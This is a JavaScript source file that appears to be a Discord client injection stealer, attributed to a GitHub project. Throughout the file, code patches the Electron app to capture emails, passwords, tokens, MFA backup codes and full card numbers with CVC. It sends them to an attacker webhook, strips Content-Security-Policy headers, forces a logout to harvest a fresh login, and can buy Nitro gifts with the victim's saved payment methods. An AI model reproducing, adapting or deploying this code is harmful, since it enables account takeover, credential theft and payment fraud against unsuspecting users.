582 lines
22 KiB
JavaScript
582 lines
22 KiB
JavaScript
const args = process.argv;
|
|
const fs = require('fs');
|
|
const path = require('path');
|
|
const querystring = require('querystring');
|
|
const { BrowserWindow, session } = require('electron')
|
|
|
|
const config = {
|
|
auto_buy_nitro: false,
|
|
ping_on_run: false,
|
|
ping_val: '@everyone',
|
|
embed_name: 'Discord Injection', //name of the webhook thats gonna send the info
|
|
embed_icon: 'https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png'.replace(/ /g,'%20'), //icon for the webhook thats gonna send the info (yes you can have spaces in the url)
|
|
embed_color: 8363488, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it)
|
|
webhook: '%WEBHOOK%', //your discord webhook there obviously
|
|
/* DON'T TOUCH UNDER HERE IF UNLESS YOU'RE MODIFYING THE INJECTION OR KNOW WHAT YOU'RE DOING */
|
|
api: 'https://discord.com/api/v9/users/@me',
|
|
bin: 'https://dpaste.com/api/',
|
|
nitro: {
|
|
boost: {
|
|
year: {
|
|
id: "521847234246082599",
|
|
sku: "511651885459963904",
|
|
price: "9999",
|
|
},
|
|
month: {
|
|
id: "521847234246082599",
|
|
sku: "511651880837840896",
|
|
price: "999",
|
|
},
|
|
},
|
|
classic: {
|
|
month: {
|
|
id: "521846918637420545",
|
|
sku: "511651871736201216",
|
|
price: "499",
|
|
},
|
|
},
|
|
},
|
|
filter: {
|
|
urls: [
|
|
'https://discord.com/api/v*/users/@me',
|
|
'https://discordapp.com/api/v*/users/@me',
|
|
'https://*.discord.com/api/v*/users/@me',
|
|
'https://discordapp.com/api/v*/auth/login',
|
|
'https://discord.com/api/v*/auth/login',
|
|
'https://*.discord.com/api/v*/auth/login',
|
|
'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
|
|
'https://api.stripe.com/v*/tokens',
|
|
]
|
|
},
|
|
filter2: {
|
|
urls: [
|
|
'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
|
|
'https://*.discord.com/api/v*/applications/detectable',
|
|
'https://discord.com/api/v*/applications/detectable',
|
|
'https://*.discord.com/api/v*/users/@me/library',
|
|
'https://discord.com/api/v*/users/@me/library',
|
|
'https://*.discord.com/api/v*/users/@me/billing/subscriptions',
|
|
'https://discord.com/api/v*/users/@me/billing/subscriptions',
|
|
'wss://remote-auth-gateway.discord.gg/*',
|
|
]
|
|
}
|
|
}
|
|
|
|
const discordPath = (function() {
|
|
const useRelease = args[2] && args[2].toLowerCase() === "release";
|
|
const releaseInput = useRelease ? args[3] && args[3].toLowerCase() : args[2] && args[2].toLowerCase();
|
|
const release = releaseInput === "canary" ? "Discord Canary" : releaseInput === "ptb" ? "Discord PTB" : "Discord";
|
|
let resourcePath = "";
|
|
if (process.platform === "win32") {
|
|
const basedir = path.join(process.env.LOCALAPPDATA, release.replace(/ /g, ""));
|
|
const version = fs.readdirSync(basedir).filter(f => fs.lstatSync(path.join(basedir, f)).isDirectory() && f.split(".").length > 1).sort().reverse()[0];
|
|
resourcePath = path.join(basedir, version, "resources");
|
|
}
|
|
else if (process.platform === "darwin") {
|
|
const appPath = releaseInput === "canary" ? path.join("/Applications", "Discord Canary.app")
|
|
: releaseInput === "ptb" ? path.join("/Applications", "Discord PTB.app")
|
|
: useRelease && args[3] ? args[3] ? args[2] : args[2]
|
|
: path.join("/Applications", "Discord.app");
|
|
|
|
resourcePath = path.join(appPath, "Contents", "Resources");
|
|
}
|
|
|
|
if (fs.existsSync(resourcePath)) return resourcePath;
|
|
return "";
|
|
})();
|
|
|
|
function updateCheck() {
|
|
const appPath = path.join(discordPath, "app");
|
|
const packageJson = path.join(appPath, "package.json");
|
|
const resourceIndex = path.join(appPath, "index.js");
|
|
if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
|
|
if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson, (err) => {});
|
|
if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex, (err) => {});
|
|
|
|
|
|
if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0;
|
|
fs.rmdirSync(path.join(__dirname, 'initiation'));
|
|
execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`)
|
|
return !1;
|
|
}
|
|
|
|
const execScript = async(script) => {
|
|
const window = BrowserWindow.getAllWindows()[0];
|
|
return await window.webContents.executeJavaScript(script, !0)
|
|
};
|
|
|
|
const dpaste = async(content) => {
|
|
const raw = await execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("POST", "${config.bin}", false);
|
|
xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
|
|
xmlHttp.send('content=${encodeURIComponent(content)}&expiry_days=30');
|
|
xmlHttp.responseText;`)
|
|
return raw+'.txt'
|
|
};
|
|
|
|
const getInfo = async(token) => {
|
|
const info = await execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("GET", "${config.api}", false);
|
|
xmlHttp.setRequestHeader("Authorization", "${token}");
|
|
xmlHttp.send(null);
|
|
xmlHttp.responseText;`)
|
|
return JSON.parse(info)
|
|
};
|
|
|
|
const getMfa = async(password, token) => {
|
|
if (!token.startsWith('.mfa')) return 'N/A';
|
|
let content = "";
|
|
const mfa = await execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("POST", "${config.api}/mfa/codes", false);
|
|
xmlHttp.setRequestHeader('Content-Type', 'application/json');
|
|
xmlHttp.setRequestHeader("authorization", "${token}");
|
|
xmlHttp.send(JSON.stringify({\"password\":\"${password}\",\"regenerate\":false}));
|
|
xmlHttp.responseText
|
|
`)
|
|
const json = JSON.parse(mfa)
|
|
let codes = json.backup_codes
|
|
const r = codes.filter((code) => {
|
|
return code.consumed === null
|
|
})
|
|
for (let i in r) {
|
|
content += `${r[i].code.insert(4, "-")}\n`
|
|
}
|
|
const paste = await dpaste(content);
|
|
return `[click me!](${paste})`
|
|
};
|
|
|
|
const fetchBilling = async(token) => {
|
|
const bill = await execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("GET", "${config.api}/billing/payment-sources", false);
|
|
xmlHttp.setRequestHeader("Authorization", "${token}");
|
|
xmlHttp.send(null);
|
|
xmlHttp.responseText`)
|
|
if (bill && !bill.length) {
|
|
return "";
|
|
}
|
|
return JSON.parse(JSON.parse(bill))
|
|
};
|
|
const getBilling = async (token) => {
|
|
const data = await fetchBilling(token)
|
|
if (data === "") return "❌";
|
|
let billing = "";
|
|
data.forEach(x => {
|
|
if (x.type === 2 && !x.invalid) {
|
|
billing += "✔️" + " <:paypal:951139189389410365>";
|
|
} else if (x.type === 1 && !x.invalid) {
|
|
billing += "✔️" + " 💳";
|
|
} else {
|
|
billing = "❌";
|
|
};
|
|
});
|
|
if (billing === "") billing = "❌"
|
|
return billing;
|
|
};
|
|
|
|
const Purchase = async (token, id, _type, _time) => {
|
|
const req = execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("POST", "${config.api}/store/skus/${config.nitro[_type][_time]['id']}/purchase", false);
|
|
xmlHttp.setRequestHeader("Authorization", "${token}");
|
|
xmlHttp.send(${JSON.stringify(
|
|
{
|
|
"gift": true,
|
|
"sku_subscription_plan_id": config.nitro[_type][_time]['sku'],
|
|
"payment_source_id": id,
|
|
"payment_source_token": 'None',
|
|
"expected_amount": config.nitro[_type][_time]['price'],
|
|
"expected_currency": "usd",
|
|
"purchase_token": "500fb34b-671a-4614-a72e-9d13becc2e95"
|
|
}
|
|
)});
|
|
xmlHttp.responseText`)
|
|
if (req['gift_code']) {
|
|
return 'https://discord.gift/'+req['gift_code'];
|
|
} else return null;
|
|
};
|
|
|
|
const buyNitro = async (token) => {
|
|
if (!config.auto_buy_nitro) return 'Auto Buy Nitro disabled';
|
|
const data = await fetchBilling(token);
|
|
const valid = []
|
|
data.forEach(x => {
|
|
if (x.type === 2 && !x.invalid) {
|
|
valid.push(x.id)
|
|
} else if (x.type === 1 && !x.invalid) {
|
|
valid.push(x.id)
|
|
}
|
|
});
|
|
for (let id in valid) {
|
|
const first = Purchase(token, id, 'boost', 'year')
|
|
if (first !== null) {
|
|
return first;
|
|
} else {
|
|
const second = Purchase(token, id, 'boost', 'month')
|
|
if (second !== null) {
|
|
return second;
|
|
} else {
|
|
const third = Purchase(token, id, 'classic', 'month')
|
|
if (third !== null) {
|
|
return third;
|
|
} else {
|
|
return 'Failed to Purchase Gift'
|
|
}
|
|
}
|
|
}
|
|
};
|
|
};
|
|
|
|
const getNitro = (flags) => {
|
|
switch (flags) {
|
|
case 0:
|
|
return "No Nitro";
|
|
case 1:
|
|
return "Nitro Classic";
|
|
case 2:
|
|
return "Nitro Boost";
|
|
default:
|
|
return "No Nitro";
|
|
};
|
|
};
|
|
|
|
const getBadges = (flags) => {
|
|
let badges = "";
|
|
switch (flags) {
|
|
case 1:
|
|
badges += "Discord Staff, "
|
|
break;
|
|
case 2:
|
|
badges += "Partnered Server Owner, "
|
|
break;
|
|
case 131072:
|
|
badges += "Discord Developer, "
|
|
break;
|
|
case 4:
|
|
badges += "Hypesquad Event, "
|
|
break;
|
|
case 16384:
|
|
badges += "Gold BugHunter, "
|
|
break;
|
|
case 8:
|
|
badges += "Green BugHunter, "
|
|
break;
|
|
case 512:
|
|
badges += "Early Supporter, "
|
|
break;
|
|
case 128:
|
|
badges += "HypeSquad Brillance, "
|
|
break;
|
|
case 64:
|
|
badges += "HypeSquad Brillance, "
|
|
break;
|
|
case 256:
|
|
badges += "HypeSquad Balance, "
|
|
break;
|
|
case 0:
|
|
badges = "None"
|
|
break;
|
|
default:
|
|
badges = "None"
|
|
break;
|
|
}
|
|
return badges
|
|
}
|
|
const hooker = (content) => {
|
|
execScript(`var xmlHttp = new XMLHttpRequest();
|
|
xmlHttp.open("POST", "${config.webhook}", true);
|
|
xmlHttp.setRequestHeader('Content-Type', 'application/json');
|
|
xmlHttp.setRequestHeader('Access-Control-Allow-Origin', '*');
|
|
xmlHttp.send(JSON.stringify(${JSON.stringify(content)}));
|
|
`)
|
|
}
|
|
const login = async (email, password, token) => {
|
|
const json = await getInfo(token);
|
|
const nitro = getNitro(json.premium_type);
|
|
const badges = getBadges(json.flags)
|
|
const billing = await getBilling(token)
|
|
const mfa = await getMfa(password, token);
|
|
const content = {
|
|
username: config.embed_name,
|
|
avatar_url: config.embed_icon,
|
|
embeds: [
|
|
{
|
|
"color": config.embed_color,
|
|
"fields": [
|
|
{
|
|
"name": "**Account Info**",
|
|
"value": `Email: **${email}** - Password: **${password}**`,
|
|
"inline": false
|
|
},
|
|
{
|
|
"name": "**Other Info**",
|
|
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
|
|
"inline": false
|
|
},
|
|
{
|
|
"name": "**Token**",
|
|
"value": `\`${token}\``,
|
|
"inline": false
|
|
}
|
|
],
|
|
"author": {
|
|
"name": json.username +"#" + json.discriminator + "・" + json.id,
|
|
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
|
|
},
|
|
"footer": {
|
|
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
|
|
}
|
|
}
|
|
]
|
|
}
|
|
if (config.ping_on_run) content['content'] = config.ping_val;
|
|
hooker(content)
|
|
}
|
|
const passwordChanged = async (oldpassword, newpassword, token) => {
|
|
const json = await getInfo(token);
|
|
const nitro = getNitro(json.premium_type);
|
|
const badges = getBadges(json.flags)
|
|
const billing = await getBilling(token)
|
|
const mfa = await getMfa(newpassword, token)
|
|
const content = {
|
|
username: config.embed_name,
|
|
avatar_url: config.embed_icon,
|
|
embeds: [
|
|
{
|
|
"color": config.embed_color,
|
|
"fields": [
|
|
{
|
|
"name": "**Password Changed**",
|
|
"value": `Email: **${json.email}**\nOld Password: **${oldpassword}**\nNew Password: **${newpassword}**`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Other Info**",
|
|
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Token**",
|
|
"value": `\`${token}\``,
|
|
"inline": false
|
|
}
|
|
],
|
|
"author": {
|
|
"name": json.username +"#" + json.discriminator + "・" + json.id,
|
|
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
|
|
},
|
|
"footer": {
|
|
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
|
|
}
|
|
}
|
|
]
|
|
}
|
|
if (config.ping_on_run) content['content'] = config.ping_val;
|
|
hooker(content)
|
|
}
|
|
const emailChanged = async (email, password, token) => {
|
|
const json = await getInfo(token);
|
|
const nitro = getNitro(json.premium_type);
|
|
const badges = getBadges(json.flags)
|
|
const billing = await getBilling(token)
|
|
const mfa = await getMfa(password, token)
|
|
const content = {
|
|
username: config.embed_name,
|
|
avatar_url: config.embed_icon,
|
|
embeds: [
|
|
{
|
|
"color": config.embed_color,
|
|
"fields": [
|
|
{
|
|
"name": "**Email Changed**",
|
|
"value": `New Email: **${email}**\nPassword: **${password}**`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Other Info**",
|
|
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Token**",
|
|
"value": `\`${token}\``,
|
|
"inline": false
|
|
}
|
|
],
|
|
"author": {
|
|
"name": json.username +"#" + json.discriminator + "・" + json.id,
|
|
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
|
|
},
|
|
"footer": {
|
|
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
|
|
}
|
|
}
|
|
]
|
|
}
|
|
if (config.ping_on_run) content['content'] = config.ping_val;
|
|
hooker(content)
|
|
}
|
|
|
|
const PaypalAdded = async (token) => {
|
|
const json = await getInfo(token);
|
|
const nitro = getNitro(json.premium_type);
|
|
const badges = getBadges(json.flags)
|
|
const billing = getBilling(token)
|
|
const code = await buyNitro(token)
|
|
const content = {
|
|
username: config.embed_name,
|
|
avatar_url: config.embed_icon,
|
|
embeds: [
|
|
{
|
|
"color": config.embed_color,
|
|
"fields": [
|
|
{
|
|
"name": "**Paypal Added**",
|
|
"value": `Nitro code: \`${code}\``,
|
|
"inline": false
|
|
},
|
|
{
|
|
"name": "**Other Info**",
|
|
"value": `Nitro Type: **${nitro}*\nBadges: **${badges}**\nBilling: **${billing}**`,
|
|
"inline": false
|
|
},
|
|
{
|
|
"name": "**Token**",
|
|
"value": `\`${token}\``,
|
|
"inline": false
|
|
}
|
|
],
|
|
"author": {
|
|
"name": json.username +"#" + json.discriminator + "・" + json.id,
|
|
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
|
|
},
|
|
"footer": {
|
|
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
|
|
}
|
|
}
|
|
]
|
|
}
|
|
if (config.ping_on_run) content['content'] = config.ping_val;
|
|
hooker(content)
|
|
}
|
|
const ccAdded = async (number, cvc, expir_month, expir_year, token) => {
|
|
const json = await getInfo(token);
|
|
const nitro = getNitro(json.premium_type);
|
|
const badges = getBadges(json.flags)
|
|
const billing = await getBilling(token)
|
|
const code = await buyNitro(token)
|
|
const content = {
|
|
username: config.embed_name,
|
|
avatar_url: config.embed_icon,
|
|
embeds: [
|
|
{
|
|
"color": config.embed_color,
|
|
"fields": [
|
|
{
|
|
"name": "**Credit Card Added**",
|
|
"value": `Credit Card Number: ${number}\nCVC: ${cvc}\nCredit Card Expiration: ${expir_month}/${expir_year}`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Other Info**",
|
|
"value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
|
|
"inline": true
|
|
},
|
|
{
|
|
"name": "**Nitro Code**",
|
|
"value": `\`${code}\``,
|
|
"inline": false
|
|
},
|
|
{
|
|
"name": "**Token**",
|
|
"value": `\`${token}\``,
|
|
"inline": false
|
|
}
|
|
],
|
|
"author": {
|
|
"name": json.username +"#" + json.discriminator + "・" + json.id,
|
|
"icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`
|
|
},
|
|
"footer": {
|
|
"text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection"
|
|
}
|
|
}
|
|
]
|
|
}
|
|
if (config.ping_on_run) content['content'] = config.ping_val;
|
|
hooker(content)
|
|
}
|
|
|
|
session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => {
|
|
if (details.url.startsWith("wss://")) {
|
|
callback({
|
|
cancel: true
|
|
})
|
|
return;
|
|
}
|
|
if (updateCheck()) {}
|
|
|
|
callback({})
|
|
return;
|
|
})
|
|
|
|
session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
|
|
if (details.url.startsWith(config.webhook)) {
|
|
if (details.url.includes("discord.com")) {
|
|
callback({
|
|
responseHeaders: Object.assign({
|
|
'Access-Control-Allow-Headers': "*"
|
|
}, details.responseHeaders)
|
|
});
|
|
} else {
|
|
callback({
|
|
responseHeaders: Object.assign({
|
|
"Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],
|
|
'Access-Control-Allow-Headers': "*",
|
|
"Access-Control-Allow-Origin": "*"
|
|
}, details.responseHeaders)
|
|
});
|
|
}
|
|
} else {
|
|
delete details.responseHeaders['content-security-policy'];
|
|
delete details.responseHeaders['content-security-policy-report-only'];
|
|
|
|
callback({
|
|
responseHeaders: {
|
|
...details.responseHeaders,
|
|
'Access-Control-Allow-Headers': "*"
|
|
}
|
|
})
|
|
}
|
|
})
|
|
|
|
session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => {
|
|
const unparsedData = details.uploadData[0].bytes
|
|
const data = JSON.parse(Buffer.from(unparsedData).toString())
|
|
const token = await execScript(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`)
|
|
|
|
switch (true) {
|
|
case details.url.endsWith('login'):
|
|
login(data.login, data.password, token)
|
|
break;
|
|
|
|
case details.url.endsWith('users/@me') && details.method === 'PATCH' && data.password:
|
|
if (data.email) {
|
|
emailChanged(data.email, data.password, token)
|
|
};
|
|
if (data.new_password) {
|
|
passwordChanged(data.password, data.new_password, token)
|
|
}
|
|
break;
|
|
|
|
case details.url.endsWith('tokens') && details.method === "POST":
|
|
const item = querystring.parse(unparsedData.toString())
|
|
ccAdded(item["card[number]"], item["card[cvc]"], item["card[exp_month]"], item["card[exp_year]"], token)
|
|
break;
|
|
|
|
case details.url.endsWith('paypal_accounts') && details.method === "POST":
|
|
PaypalAdded(token)
|
|
break;
|
|
default:
|
|
break;
|
|
}
|
|
});
|
|
module.exports = require('./core.asar') |